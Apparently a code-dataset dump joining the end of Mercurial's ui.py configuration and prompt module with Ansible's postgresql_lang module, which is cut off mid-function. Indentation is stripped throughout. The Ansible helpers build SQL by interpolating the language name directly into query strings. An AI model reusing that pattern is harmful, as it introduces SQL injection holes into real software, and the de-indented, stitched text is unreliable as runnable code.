Returns a 2-tuple of ``(option, sub-options)``, where `sub-options``
is a dict of defined sub-options where keys and values are strings.
"""
data = self._data(untrusted)
main = data.get(section, name, default)
if self.debugflag and not untrusted and self._reportuntrusted:
uvalue = self._ucfg.get(section, name)
if uvalue is not None and uvalue != main:
self.debug('ignoring untrusted configuration option '
'%s.%s = %s\n' % (section, name, uvalue))
sub = {}
prefix = '%s:' % name
for k, v in data.items(section):
if k.startswith(prefix):
sub[k[len(prefix):]] = v
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in sub.items():
uvalue = self._ucfg.get(section, '%s:%s' % (name, k))
if uvalue is not None and uvalue != v:
self.debug('ignoring untrusted configuration option '
'%s:%s.%s = %s\n' % (section, name, k, uvalue))
return main, sub
def configpath(self, section, name, default=None, untrusted=False):
'get a path config item, expanded relative to repo root or config file'
v = self.config(section, name, default, untrusted)
if v is None:
return None
if not os.path.isabs(v) or "://" not in v:
src = self.configsource(section, name, untrusted)
if ':' in src:
base = os.path.dirname(src.rsplit(':')[0])
v = os.path.join(base, os.path.expanduser(v))
return v
def configbool(self, section, name, default=False, untrusted=False):
"""parse a configuration element as a boolean
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'true', 'yes')
>>> u.configbool(s, 'true')
True
>>> u.setconfig(s, 'false', 'no')
>>> u.configbool(s, 'false')
False
>>> u.configbool(s, 'unknown')
False
>>> u.configbool(s, 'unknown', True)
True
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbool(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a boolean ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
if isinstance(v, bool):
return v
b = util.parsebool(v)
if b is None:
raise error.ConfigError(_("%s.%s is not a boolean ('%s')")
% (section, name, v))
return b
def configint(self, section, name, default=None, untrusted=False):
"""parse a configuration element as an integer
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'int1', '42')
>>> u.configint(s, 'int1')
42
>>> u.setconfig(s, 'int2', '-42')
>>> u.configint(s, 'int2')
-42
>>> u.configint(s, 'unknown', 7)
7
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configint(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not an integer ('somevalue')
"""
v = self.config(section, name, None, untrusted)
if v is None:
return default
try:
return int(v)
except ValueError:
raise error.ConfigError(_("%s.%s is not an integer ('%s')")
% (section, name, v))
def configbytes(self, section, name, default=0, untrusted=False):
"""parse a configuration element as a quantity in bytes
Units can be specified as b (bytes), k or kb (kilobytes), m or
mb (megabytes), g or gb (gigabytes).
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'val1', '42')
>>> u.configbytes(s, 'val1')
42
>>> u.setconfig(s, 'val2', '42.5 kb')
>>> u.configbytes(s, 'val2')
43520
>>> u.configbytes(s, 'unknown', '7 MB')
7340032
>>> u.setconfig(s, 'invalid', 'somevalue')
>>> u.configbytes(s, 'invalid')
Traceback (most recent call last):
...
ConfigError: foo.invalid is not a byte quantity ('somevalue')
"""
value = self.config(section, name)
if value is None:
if not isinstance(default, str):
return default
value = default
try:
return util.sizetoint(value)
except error.ParseError:
raise error.ConfigError(_("%s.%s is not a byte quantity ('%s')")
% (section, name, value))
def configlist(self, section, name, default=None, untrusted=False):
"""parse a configuration element as a list of comma/space separated
strings
>>> u = ui(); s = 'foo'
>>> u.setconfig(s, 'list1', 'this,is "a small" ,test')
>>> u.configlist(s, 'list1')
['this', 'is', 'a small', 'test']
"""
def _parse_plain(parts, s, offset):
whitespace = False
while offset < len(s) and (s[offset].isspace() or s[offset] == ','):
whitespace = True
offset += 1
if offset >= len(s):
return None, parts, offset
if whitespace:
parts.append('')
if s[offset] == '"' and not parts[-1]:
return _parse_quote, parts, offset + 1
elif s[offset] == '"' and parts[-1][-1] == '\\':
parts[-1] = parts[-1][:-1] + s[offset]
return _parse_plain, parts, offset + 1
parts[-1] += s[offset]
return _parse_plain, parts, offset + 1
def _parse_quote(parts, s, offset):
if offset < len(s) and s[offset] == '"': # ""
parts.append('')
offset += 1
while offset < len(s) and (s[offset].isspace() or
s[offset] == ','):
offset += 1
return _parse_plain, parts, offset
while offset < len(s) and s[offset] != '"':
if (s[offset] == '\\' and offset + 1 < len(s)
and s[offset + 1] == '"'):
offset += 1
parts[-1] += '"'
else:
parts[-1] += s[offset]
offset += 1
if offset >= len(s):
real_parts = _configlist(parts[-1])
if not real_parts:
parts[-1] = '"'
else:
real_parts[0] = '"' + real_parts[0]
parts = parts[:-1]
parts.extend(real_parts)
return None, parts, offset
offset += 1
while offset < len(s) and s[offset] in [' ', ',']:
offset += 1
if offset < len(s):
if offset + 1 == len(s) and s[offset] == '"':
parts[-1] += '"'
offset += 1
else:
parts.append('')
else:
return None, parts, offset
return _parse_plain, parts, offset
def _configlist(s):
s = s.rstrip(' ,')
if not s:
return []
parser, parts, offset = _parse_plain, [''], 0
while parser:
parser, parts, offset = parser(parts, s, offset)
return parts
result = self.config(section, name, untrusted=untrusted)
if result is None:
result = default or []
if isinstance(result, basestring):
result = _configlist(result.lstrip(' ,\n'))
if result is None:
result = default or []
return result
def hasconfig(self, section, name, untrusted=False):
return self._data(untrusted).hasitem(section, name)
def has_section(self, section, untrusted=False):
'''tell whether section exists in config.'''
return section in self._data(untrusted)
def configitems(self, section, untrusted=False, ignoresub=False):
items = self._data(untrusted).items(section)
if ignoresub:
newitems = {}
for k, v in items:
if ':' not in k:
newitems[k] = v
items = newitems.items()
if self.debugflag and not untrusted and self._reportuntrusted:
for k, v in self._ucfg.items(section):
if self._tcfg.get(section, k) != v:
self.debug("ignoring untrusted configuration option "
"%s.%s = %s\n" % (section, k, v))
return items
def walkconfig(self, untrusted=False):
cfg = self._data(untrusted)
for section in cfg.sections():
for name, value in self.configitems(section, untrusted):
yield section, name, value
def plain(self, feature=None):
'''is plain mode active?
Plain mode means that all configuration variables which affect
the behavior and output of Mercurial should be
ignored. Additionally, the output should be stable,
reproducible and suitable for use in scripts or applications.
The only way to trigger plain mode is by setting either the
`HGPLAIN' or `HGPLAINEXCEPT' environment variables.
The return value can either be
- False if HGPLAIN is not set, or feature is in HGPLAINEXCEPT
- True otherwise
'''
if 'HGPLAIN' not in os.environ and 'HGPLAINEXCEPT' not in os.environ:
return False
exceptions = os.environ.get('HGPLAINEXCEPT', '').strip().split(',')
if feature and exceptions:
return feature not in exceptions
return True
def username(self):
"""Return default username to be used in commits.
        Searched in this order: $HGUSER, [ui] section of hgrcs, $EMAIL;
        searching stops at the first one that is set.
If not found and ui.askusername is True, ask the user, else use
($LOGNAME or $USER or $LNAME or $USERNAME) + "@full.hostname".
"""
user = os.environ.get("HGUSER")
if user is None:
user = self.config("ui", ["username", "user"])
if user is not None:
user = os.path.expandvars(user)
if user is None:
user = os.environ.get("EMAIL")
if user is None and self.configbool("ui", "askusername"):
user = self.prompt(_("enter a commit username:"), default=None)
if user is None and not self.interactive():
try:
user = '%s@%s' % (util.getuser(), socket.getfqdn())
self.warn(_("no username found, using '%s' instead\n") % user)
except KeyError:
pass
if not user:
raise error.Abort(_('no username supplied'),
hint=_('use "hg config --edit" '
'to set your username'))
if "\n" in user:
raise error.Abort(_("username %s contains a newline\n")
% repr(user))
return user
def shortuser(self, user):
"""Return a short representation of a user name or email address."""
if not self.verbose:
user = util.shortuser(user)
return user
def expandpath(self, loc, default=None):
"""Return repository location relative to cwd or from [paths]"""
try:
p = self.paths.getpath(loc)
if p:
return p.rawloc
except error.RepoError:
pass
if default:
try:
p = self.paths.getpath(default)
if p:
return p.rawloc
except error.RepoError:
pass
return loc
@util.propertycache
def paths(self):
return paths(self)
def pushbuffer(self, error=False, subproc=False, labeled=False):
"""install a buffer to capture standard output of the ui object
If error is True, the error output will be captured too.
If subproc is True, output from subprocesses (typically hooks) will be
captured too.
If labeled is True, any labels associated with buffered
output will be handled. By default, this has no effect
on the output returned, but extensions and GUI tools may
handle this argument and returned styled output. If output
is being buffered so it can be captured and parsed or
processed, labeled should not be set to True.
"""
self._buffers.append([])
self._bufferstates.append((error, subproc, labeled))
self._bufferapplylabels = labeled
def popbuffer(self):
'''pop the last buffer and return the buffered output'''
self._bufferstates.pop()
if self._bufferstates:
self._bufferapplylabels = self._bufferstates[-1][2]
else:
self._bufferapplylabels = None
return "".join(self._buffers.pop())
def write(self, *args, **opts):
'''write args to output
By default, this method simply writes to the buffer or stdout,
but extensions or GUI tools may override this method,
write_err(), popbuffer(), and label() to style output from
various parts of hg.
An optional keyword argument, "label", can be passed in.
This should be a string containing label names separated by
space. Label names take the form of "topic.type". For example,
ui.debug() issues a label of "ui.debug".
When labeling output for a specific command, a label of
"cmdname.type" is recommended. For example, status issues
a label of "status.modified" for modified files.
'''
if self._buffers:
self._buffers[-1].extend(a for a in args)
else:
self._progclear()
for a in args:
self.fout.write(a)
def write_err(self, *args, **opts):
self._progclear()
try:
if self._bufferstates and self._bufferstates[-1][0]:
return self.write(*args, **opts)
if not getattr(self.fout, 'closed', False):
self.fout.flush()
for a in args:
self.ferr.write(a)
# stderr may be buffered under win32 when redirected to files,
# including stdout.
if not getattr(self.ferr, 'closed', False):
self.ferr.flush()
except IOError as inst:
if inst.errno not in (errno.EPIPE, errno.EIO, errno.EBADF):
raise
def flush(self):
try: self.fout.flush()
except (IOError, ValueError): pass
try: self.ferr.flush()
except (IOError, ValueError): pass
def _isatty(self, fh):
if self.configbool('ui', 'nontty', False):
return False
return util.isatty(fh)
def interactive(self):
'''is interactive input allowed?
An interactive session is a session where input can be reasonably read
from `sys.stdin'. If this function returns false, any attempt to read
from stdin should fail with an error, unless a sensible default has been
specified.
Interactiveness is triggered by the value of the `ui.interactive'
configuration variable or - if it is unset - when `sys.stdin' points
to a terminal device.
This function refers to input only; for output, see `ui.formatted()'.
'''
i = self.configbool("ui", "interactive", None)
if i is None:
# some environments replace stdin without implementing isatty
# usually those are non-interactive
return self._isatty(self.fin)
return i
def termwidth(self):
'''how wide is the terminal in columns?
'''
if 'COLUMNS' in os.environ:
try:
return int(os.environ['COLUMNS'])
except ValueError:
pass
return util.termwidth()
def formatted(self):
'''should formatted output be used?
        It is often desirable to format the output to suit the output medium.
        Examples of this are truncating long lines or colorizing messages.
        However, this is often not desirable when piping output into other
utilities, e.g. `grep'.
Formatted output is triggered by the value of the `ui.formatted'
configuration variable or - if it is unset - when `sys.stdout' points
to a terminal device. Please note that `ui.formatted' should be
considered an implementation detail; it is not intended for use outside
Mercurial or its extensions.
This function refers to output only; for input, see `ui.interactive()'.
This function always returns false when in plain mode, see `ui.plain()'.
'''
if self.plain():
return False
i = self.configbool("ui", "formatted", None)
if i is None:
# some environments replace stdout without implementing isatty
# usually those are non-interactive
return self._isatty(self.fout)
return i
def _readline(self, prompt=''):
if self._isatty(self.fin):
try:
# magically add command line editing support, where
# available
import readline
# force demandimport to really load the module
readline.read_history_file
# windows sometimes raises something other than ImportError
except Exception:
pass
# call write() so output goes through subclassed implementation
# e.g. color extension on Windows
self.write(prompt)
# instead of trying to emulate raw_input, swap (self.fin,
# self.fout) with (sys.stdin, sys.stdout)
oldin = sys.stdin
oldout = sys.stdout
sys.stdin = self.fin
sys.stdout = self.fout
# prompt ' ' must exist; otherwise readline may delete entire line
# - http://bugs.python.org/issue12833
line = raw_input(' ')
sys.stdin = oldin
sys.stdout = oldout
# When stdin is in binary mode on Windows, it can cause
# raw_input() to emit an extra trailing carriage return
if os.linesep == '\r\n' and line and line[-1] == '\r':
line = line[:-1]
return line
def prompt(self, msg, default="y"):
"""Prompt user with msg, read response.
If ui is not interactive, the default is returned.
"""
if not self.interactive():
self.write(msg, ' ', default or '', "\n")
return default
try:
r = self._readline(self.label(msg, 'ui.prompt'))
if not r:
r = default
if self.configbool('ui', 'promptecho'):
self.write(r, "\n")
return r
except EOFError:
raise error.ResponseExpected()
@staticmethod
def extractchoices(prompt):
"""Extract prompt message and list of choices from specified prompt.
This returns tuple "(message, choices)", and "choices" is the
list of tuple "(response character, text without &)".
>>> ui.extractchoices("awake? $$ &Yes $$ &No")
('awake? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("line\\nbreak? $$ &Yes $$ &No")
('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
>>> ui.extractchoices("want lots of $$money$$?$$Ye&s$$N&o")
('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
"""
# Sadly, the prompt string may have been built with a filename
# containing "$$" so let's try to find the first valid-looking
# prompt to start parsing. Sadly, we also can't rely on
# choices containing spaces, ASCII, or basically anything
# except an ampersand followed by a character.
m = re.match(r'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
msg = m.group(1)
choices = [p.strip(' ') for p in m.group(2).split('$$')]
return (msg,
[(s[s.index('&') + 1].lower(), s.replace('&', '', 1))
for s in choices])
def promptchoice(self, prompt, default=0):
"""Prompt user with a message, read response, and ensure it matches
one of the provided choices. The prompt is formatted as follows:
"would you like fries with that (Yn)? $$ &Yes $$ &No"
The index of the choice is returned. Responses are case
insensitive. If ui is not interactive, the default is
returned.
"""
msg, choices = self.extractchoices(prompt)
resps = [r for r, t in choices]
while True:
r = self.prompt(msg, resps[default])
if r.lower() in resps:
return resps.index(r.lower())
self.write(_("unrecognized response\n"))
def getpass(self, prompt=None, default=None):
if not self.interactive():
return default
try:
self.write_err(self.label(prompt or _('password: '), 'ui.prompt'))
# disable getpass() only if explicitly specified. it's still valid
# to interact with tty even if fin is not a tty.
if self.configbool('ui', 'nontty'):
return self.fin.readline().rstrip('\n')
else:
return getpass.getpass('')
except EOFError:
raise error.ResponseExpected()
def status(self, *msg, **opts):
'''write status message to output (if ui.quiet is False)
This adds an output label of "ui.status".
'''
if not self.quiet:
opts['label'] = opts.get('label', '') + ' ui.status'
self.write(*msg, **opts)
def warn(self, *msg, **opts):
'''write warning message to output (stderr)
This adds an output label of "ui.warning".
'''
opts['label'] = opts.get('label', '') + ' ui.warning'
self.write_err(*msg, **opts)
def note(self, *msg, **opts):
'''write note to output (if ui.verbose is True)
This adds an output label of "ui.note".
'''
if self.verbose:
opts['label'] = opts.get('label', '') + ' ui.note'
self.write(*msg, **opts)
def debug(self, *msg, **opts):
'''write debug message to output (if ui.debugflag is True)
This adds an output label of "ui.debug".
'''
if self.debugflag:
opts['label'] = opts.get('label', '') + ' ui.debug'
self.write(*msg, **opts)
def edit(self, text, user, extra=None, editform=None, pending=None):
extra_defaults = { 'prefix': 'editor' }
if extra is not None:
extra_defaults.update(extra)
extra = extra_defaults
(fd, name) = tempfile.mkstemp(prefix='hg-' + extra['prefix'] + '-',
suffix=".txt", text=True)
try:
f = os.fdopen(fd, "w")
f.write(text)
f.close()
environ = {'HGUSER': user}
if 'transplant_source' in extra:
environ.update({'HGREVISION': hex(extra['transplant_source'])})
for label in ('intermediate-source', 'source', 'rebase_source'):
if label in extra:
environ.update({'HGREVISION': extra[label]})
break
if editform:
environ.update({'HGEDITFORM': editform})
if pending:
environ.update({'HG_PENDING': pending})
editor = self.geteditor()
self.system("%s \"%s\"" % (editor, name),
environ=environ,
onerr=error.Abort, errprefix=_("edit failed"))
f = open(name)
t = f.read()
f.close()
finally:
os.unlink(name)
return t
def system(self, cmd, environ=None, cwd=None, onerr=None, errprefix=None):
'''execute shell command with appropriate output stream. command
output will be redirected if fout is not stdout.
'''
out = self.fout
if any(s[1] for s in self._bufferstates):
out = self
return util.system(cmd, environ=environ, cwd=cwd, onerr=onerr,
errprefix=errprefix, out=out)
def traceback(self, exc=None, force=False):
'''print exception traceback if traceback printing enabled or forced.
only to call in exception handler. returns true if traceback
printed.'''
if self.tracebackflag or force:
if exc is None:
exc = sys.exc_info()
cause = getattr(exc[1], 'cause', None)
if cause is not None:
causetb = traceback.format_tb(cause[2])
exctb = traceback.format_tb(exc[2])
exconly = traceback.format_exception_only(cause[0], cause[1])
# exclude frame where 'exc' was chained and rethrown from exctb
self.write_err('Traceback (most recent call last):\n',
''.join(exctb[:-1]),
''.join(causetb),
''.join(exconly))
else:
output = traceback.format_exception(exc[0], exc[1], exc[2])
self.write_err(''.join(output))
return self.tracebackflag or force
def geteditor(self):
'''return editor to use'''
if sys.platform == 'plan9':
# vi is the MIPS instruction simulator on Plan 9. We
# instead default to E to plumb commit messages to
# avoid confusion.
editor = 'E'
else:
editor = 'vi'
return (os.environ.get("HGEDITOR") or
self.config("ui", "editor") or
os.environ.get("VISUAL") or
os.environ.get("EDITOR", editor))
@util.propertycache
def _progbar(self):
"""setup the progbar singleton to the ui object"""
if (self.quiet or self.debugflag
or self.configbool('progress', 'disable', False)
or not progress.shouldprint(self)):
return None
return getprogbar(self)
def _progclear(self):
"""clear progress bar output if any. use it before any output"""
if '_progbar' not in vars(self): # nothing loaded yet
return
if self._progbar is not None and self._progbar.printed:
self._progbar.clear()
def progress(self, topic, pos, item="", unit="", total=None):
'''show a progress message
With stock hg, this is simply a debug message that is hidden
by default, but with extensions or GUI tools it may be
visible. 'topic' is the current operation, 'item' is a
non-numeric marker of the current position (i.e. the currently
in-process file), 'pos' is the current numeric position (i.e.
revision, bytes, etc.), unit is a corresponding unit label,
and total is the highest expected pos.
Multiple nested topics may be active at a time.
All topics should be marked closed by setting pos to None at
termination.
'''
if self._progbar is not None:
self._progbar.progress(topic, pos, item=item, unit=unit,
total=total)
if pos is None or not self.configbool('progress', 'debug'):
return
if unit:
unit = ' ' + unit
if item:
item = ' ' + item
if total:
pct = 100.0 * pos / total
self.debug('%s:%s %s/%s%s (%4.2f%%)\n'
% (topic, item, pos, total, unit, pct))
else:
self.debug('%s:%s %s%s\n' % (topic, item, pos, unit))
def log(self, service, *msg, **opts):
'''hook for logging facility extensions
service should be a readily-identifiable subsystem, which will
allow filtering.
*msg should be a newline-terminated format string to log, and
then any values to %-format into that format string.
**opts currently has no defined meanings.
'''
def label(self, msg, label):
'''style msg based on supplied label
Like ui.write(), this just returns msg unchanged, but extensions
and GUI tools can override it to allow styling output without
writing it.
ui.write(s, 'label') is equivalent to
ui.write(ui.label(s, 'label')).
'''
return msg
def develwarn(self, msg, stacklevel=1):
"""issue a developer warning message
Use 'stacklevel' to report the offender some layers further up in the
stack.
"""
msg = 'devel-warn: ' + msg
stacklevel += 1 # get in develwarn
if self.tracebackflag:
util.debugstacktrace(msg, stacklevel, self.ferr, self.fout)
else:
curframe = inspect.currentframe()
calframe = inspect.getouterframes(curframe, 2)
self.write_err('%s at: %s:%s (%s)\n'
% ((msg,) + calframe[stacklevel][1:4]))
def deprecwarn(self, msg, version):
"""issue a deprecation warning
- msg: message explaining what is deprecated and how to upgrade,
- version: last version where the API will be supported,
"""
msg += ("\n(compatibility will be dropped after Mercurial-%s,"
" update your code.)") % version
self.develwarn(msg, stacklevel=2)
class paths(dict):
"""Represents a collection of paths and their configs.
Data is initially derived from ui instances and the config files they have
loaded.
"""
def __init__(self, ui):
dict.__init__(self)
for name, loc in ui.configitems('paths', ignoresub=True):
# No location is the same as not existing.
if not loc:
continue
loc, sub = ui.configsuboptions('paths', name)
self[name] = path(ui, name, rawloc=loc, suboptions=sub)
def getpath(self, name, default=None):
"""Return a ``path`` from a string, falling back to default.
``name`` can be a named path or locations. Locations are filesystem
paths or URIs.
Returns None if ``name`` is not a registered path, a URI, or a local
path to a repo.
"""
# Only fall back to default if no path was requested.
if name is None:
if not default:
default = ()
elif not isinstance(default, (tuple, list)):
default = (default,)
for k in default:
try:
return self[k]
except KeyError:
continue
return None
# Most likely empty string.
# This may need to raise in the future.
if not name:
return None
try:
return self[name]
except KeyError:
# Try to resolve as a local path or URI.
try:
# We don't pass sub-options in, so no need to pass ui instance.
return path(None, None, rawloc=name)
except ValueError:
raise error.RepoError(_('repository %s does not exist') %
name)
_pathsuboptions = {}
def pathsuboption(option, attr):
"""Decorator used to declare a path sub-option.
Arguments are the sub-option name and the attribute it should set on
``path`` instances.
The decorated function will receive as arguments a ``ui`` instance,
``path`` instance, and the string value of this option from the config.
The function should return the value that will be set on the ``path``
instance.
This decorator can be used to perform additional verification of
sub-options and to change the type of sub-options.
"""
def register(func):
_pathsuboptions[option] = (attr, func)
return func
return register
@pathsuboption('pushurl', 'pushloc')
def pushurlpathoption(ui, path, value):
u = util.url(value)
# Actually require a URL.
if not u.scheme:
ui.warn(_('(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
return None
# Don't support the #foo syntax in the push URL to declare branch to
# push.
if u.fragment:
ui.warn(_('("#fragment" in paths.%s:pushurl not supported; '
'ignoring)\n') % path.name)
u.fragment = None
return str(u)
class path(object):
"""Represents an individual path and its configuration."""
def __init__(self, ui, name, rawloc=None, suboptions=None):
"""Construct a path from its config options.
``ui`` is the ``ui`` instance the path is coming from.
``name`` is the symbolic name of the path.
``rawloc`` is the raw location, as defined in the config.
``pushloc`` is the raw locations pushes should be made to.
If ``name`` is not defined, we require that the location be a) a local
filesystem path with a .hg directory or b) a URL. If not,
``ValueError`` is raised.
"""
if not rawloc:
raise ValueError('rawloc must be defined')
# Locations may define branches via syntax <base>#<branch>.
u = util.url(rawloc)
branch = None
if u.fragment:
branch = u.fragment
u.fragment = None
self.url = u
self.branch = branch
self.name = name
self.rawloc = rawloc
self.loc = str(u)
# When given a raw location but not a symbolic name, validate the
# location is valid.
if not name and not u.scheme and not self._isvalidlocalpath(self.loc):
raise ValueError('location is not a URL or path to a local '
'repo: %s' % rawloc)
suboptions = suboptions or {}
# Now process the sub-options. If a sub-option is registered, its
# attribute will always be present. The value will be None if there
# was no valid sub-option.
for suboption, (attr, func) in _pathsuboptions.iteritems():
if suboption not in suboptions:
setattr(self, attr, None)
continue
value = func(ui, self, suboptions[suboption])
setattr(self, attr, value)
def _isvalidlocalpath(self, path):
"""Returns True if the given path is a potentially valid repository.
This is its own function so that extensions can change the definition of
'valid' in this case (like when pulling from a git repo into a hg
one)."""
return os.path.isdir(os.path.join(path, '.hg'))
@property
def suboptions(self):
"""Return sub-options and their values for this path.
This is intended to be used for presentation purposes.
"""
d = {}
for subopt, (attr, _func) in _pathsuboptions.iteritems():
value = getattr(self, attr)
if value is not None:
d[subopt] = value
return d
# we instantiate one globally shared progress bar to avoid
# competing progress bars when multiple UI objects get created
_progresssingleton = None
def getprogbar(ui):
global _progresssingleton
if _progresssingleton is None:
# passing 'ui' object to the singleton is fishy,
# this is how the extension used to work but feel free to rework it.
_progresssingleton = progress.progbar(ui)
return _progresssingleton
| gpl-2.0 |
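A minimal sketch (not from the original file) exercising the configuration API defined above; it assumes the module is importable as shown and that any global hgrc files read in __init__ do not set these same keys:
u = ui()
u.setconfig('ui', 'verbose', 'yes', source='example')
u.setconfig('paths', 'default', '~/repos/example')
print(u.configbool('ui', 'verbose'))          # True
print(u.config('paths', 'default'))           # expanded to an absolute path by fixconfig()
print(u.configlist('ui', 'missing', ['a']))   # falls back to the supplied default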
valentin-krasontovitsch/ansible | lib/ansible/modules/database/postgresql/postgresql_lang.py | 1 | 11522 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2014, Jens Depuydt <http://www.jensd.be>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: postgresql_lang
short_description: Adds, removes or changes procedural languages with a PostgreSQL database.
description:
- Adds, removes or changes procedural languages with a PostgreSQL database.
   - This module allows you to add a language, remove a language or change the trust
relationship with a PostgreSQL database. The module can be used on the machine
where executed or on a remote host.
- When removing a language from a database, it is possible that dependencies prevent
     the language from being removed. In that case, you can specify cascade to
automatically drop objects that depend on the language (such as functions in the
language). In case the language can't be deleted because it is required by the
database system, you can specify fail_on_drop=no to ignore the error.
   - Be careful when marking a language as trusted since this could be a potential
security breach. Untrusted languages allow only users with the PostgreSQL superuser
privilege to use this language to create new functions.
version_added: "1.7"
options:
lang:
description:
- name of the procedural language to add, remove or change
required: true
trust:
description:
- make this language trusted for the selected db
type: bool
default: 'no'
db:
description:
- name of database where the language will be added, removed or changed
force_trust:
description:
- marks the language as trusted, even if it's marked as untrusted in pg_pltemplate.
- use with care!
type: bool
default: 'no'
fail_on_drop:
description:
- if C(yes), fail when removing a language. Otherwise just log and continue
- in some cases, it is not possible to remove a language (used by the db-system). When dependencies block the removal, consider using C(cascade).
type: bool
default: 'yes'
cascade:
description:
      - when dropping a language, also delete objects that depend on this language.
- only used when C(state=absent).
type: bool
default: 'no'
port:
description:
- Database port to connect to.
default: 5432
login_user:
description:
- User used to authenticate with PostgreSQL
default: postgres
login_password:
description:
- Password used to authenticate with PostgreSQL (must match C(login_user))
login_host:
description:
- Host running PostgreSQL where you want to execute the actions.
default: localhost
state:
description:
- The state of the language for the selected database
default: present
choices: [ "present", "absent" ]
login_unix_socket:
description:
- Path to a Unix domain socket for local connections.
version_added: '2.8'
ssl_mode:
description:
- Determines whether or with what priority a secure SSL TCP/IP connection
will be negotiated with the server.
- See U(https://www.postgresql.org/docs/current/static/libpq-ssl.html) for
more information on the modes.
- Default of C(prefer) matches libpq default.
default: prefer
choices: ["disable", "allow", "prefer", "require", "verify-ca", "verify-full"]
version_added: '2.8'
ssl_rootcert:
description:
- Specifies the name of a file containing SSL certificate authority (CA)
certificate(s). If the file exists, the server's certificate will be
verified to be signed by one of these authorities.
version_added: '2.8'
notes:
- The default authentication assumes that you are either logging in as or
sudo'ing to the postgres account on the host.
- This module uses psycopg2, a Python PostgreSQL database adapter. You must
ensure that psycopg2 is installed on the host before using this module. If
the remote host is the PostgreSQL server (which is the default case), then
PostgreSQL must also be installed on the remote host. For Ubuntu-based
systems, install the postgresql, libpq-dev, and python-psycopg2 packages
on the remote host before using this module.
requirements: [ psycopg2 ]
author:
- "Jens Depuydt (@jensdepuydt)"
- "Thomas O'Donnell (@andytom)"
'''
EXAMPLES = '''
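# Illustrative prerequisite setup for a Debian/Ubuntu managed host; the package
# names follow the notes above, and this task is a sketch, not part of this module:
- apt:
    name: [postgresql, libpq-dev, python-psycopg2]
    state: present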
# Add language pltclu to database testdb if it doesn't exist:
- postgresql_lang db=testdb lang=pltclu state=present
# Add language pltclu to database testdb if it doesn't exist and mark it as trusted:
# Marks the language as trusted if it exists but isn't trusted yet
# force_trust makes sure that the language will be marked as trusted
- postgresql_lang:
db: testdb
lang: pltclu
state: present
trust: yes
force_trust: yes
# Remove language pltclu from database testdb:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
# Remove language pltclu from database testdb and remove all dependencies:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
cascade: yes
# Remove language pltclu from database testdb but ignore errors if something prevents the removal:
- postgresql_lang:
db: testdb
lang: pltclu
state: absent
fail_on_drop: no
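# Illustrative sketch only: run the module against a remote server with explicit
# connection options; the host, credentials and ssl_mode below are placeholder values:
- postgresql_lang:
    db: testdb
    lang: pltclu
    state: present
    login_host: db.example.com
    port: 5432
    login_user: postgres
    login_password: secret
    ssl_mode: require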
'''
import traceback
try:
import psycopg2
except ImportError:
postgresqldb_found = False
else:
postgresqldb_found = True
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_native
def lang_exists(cursor, lang):
"""Checks if language exists for db"""
query = "SELECT lanname FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.rowcount > 0
def lang_istrusted(cursor, lang):
"""Checks if language is trusted for db"""
query = "SELECT lanpltrusted FROM pg_language WHERE lanname='%s'" % lang
cursor.execute(query)
return cursor.fetchone()[0]
def lang_altertrust(cursor, lang, trust):
"""Changes if language is trusted for db"""
query = "UPDATE pg_language SET lanpltrusted = %s WHERE lanname=%s"
cursor.execute(query, (trust, lang))
return True
def lang_add(cursor, lang, trust):
"""Adds language for db"""
if trust:
query = 'CREATE TRUSTED LANGUAGE "%s"' % lang
else:
query = 'CREATE LANGUAGE "%s"' % lang
cursor.execute(query)
return True
def lang_drop(cursor, lang, cascade):
"""Drops language for db"""
cursor.execute("SAVEPOINT ansible_pgsql_lang_drop")
try:
if cascade:
cursor.execute("DROP LANGUAGE \"%s\" CASCADE" % lang)
else:
cursor.execute("DROP LANGUAGE \"%s\"" % lang)
except Exception:
cursor.execute("ROLLBACK TO SAVEPOINT ansible_pgsql_lang_drop")
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return False
cursor.execute("RELEASE SAVEPOINT ansible_pgsql_lang_drop")
return True
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default="postgres"),
login_password=dict(default="", no_log=True),
login_host=dict(default=""),
login_unix_socket=dict(default=""),
db=dict(required=True),
port=dict(default='5432'),
lang=dict(required=True),
state=dict(default="present", choices=["absent", "present"]),
trust=dict(type='bool', default='no'),
force_trust=dict(type='bool', default='no'),
cascade=dict(type='bool', default='no'),
fail_on_drop=dict(type='bool', default='yes'),
ssl_mode=dict(default='prefer', choices=[
'disable', 'allow', 'prefer', 'require', 'verify-ca', 'verify-full']),
ssl_rootcert=dict(default=None),
),
supports_check_mode=True
)
db = module.params["db"]
lang = module.params["lang"]
state = module.params["state"]
trust = module.params["trust"]
force_trust = module.params["force_trust"]
cascade = module.params["cascade"]
fail_on_drop = module.params["fail_on_drop"]
sslrootcert = module.params["ssl_rootcert"]
if not postgresqldb_found:
module.fail_json(msg="the python psycopg2 module is required")
    # To use default values, keyword arguments must be absent, so
    # check which values are empty and don't include them in the **kw
# dictionary
params_map = {
"login_host": "host",
"login_user": "user",
"login_password": "password",
"port": "port",
"db": "database",
"ssl_mode": "sslmode",
"ssl_rootcert": "sslrootcert"
}
kw = dict((params_map[k], v) for (k, v) in iteritems(module.params)
if k in params_map and v != "" and v is not None)
